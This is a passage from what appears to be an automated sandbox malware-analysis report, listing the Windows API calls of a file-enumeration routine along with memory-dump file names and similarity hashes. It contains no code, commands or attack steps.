                                  • lstrcat.KERNEL32(?,00251074), ref: 00244FBD
                                    • Part of subcall function 00244910: wsprintfA.USER32 ref: 0024492C
                                    • Part of subcall function 00244910: FindFirstFileA.KERNEL32(?,?), ref: 00244943
                                    • Part of subcall function 00244910: StrCmpCA.SHLWAPI(?,00250FDC), ref: 00244971
                                    • Part of subcall function 00244910: StrCmpCA.SHLWAPI(?,00250FE0), ref: 00244987
                                    • Part of subcall function 00244910: FindNextFileA.KERNEL32(000000FF,?), ref: 00244B7D
                                    • Part of subcall function 00244910: FindClose.KERNEL32(000000FF), ref: 00244B92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                  • String ID:
                                  • API String ID: 2667927680-0
                                  • Opcode ID: 4da12670366b53de949473283b6f25a5b4bfdef4b8ae2aba005d3ddfd97ca8af
                                  • Instruction ID: 4f48e08dabceaee114f4e2de8f13495cfebb41c71800dff9022da002a6153c99
                                  • Opcode Fuzzy Hash: 4da12670366b53de949473283b6f25a5b4bfdef4b8ae2aba005d3ddfd97ca8af
                                  • Instruction Fuzzy Hash: E32198B692020867C754FBB0DC46EED333CAB94301F404554B65D92181EE749AEC8F97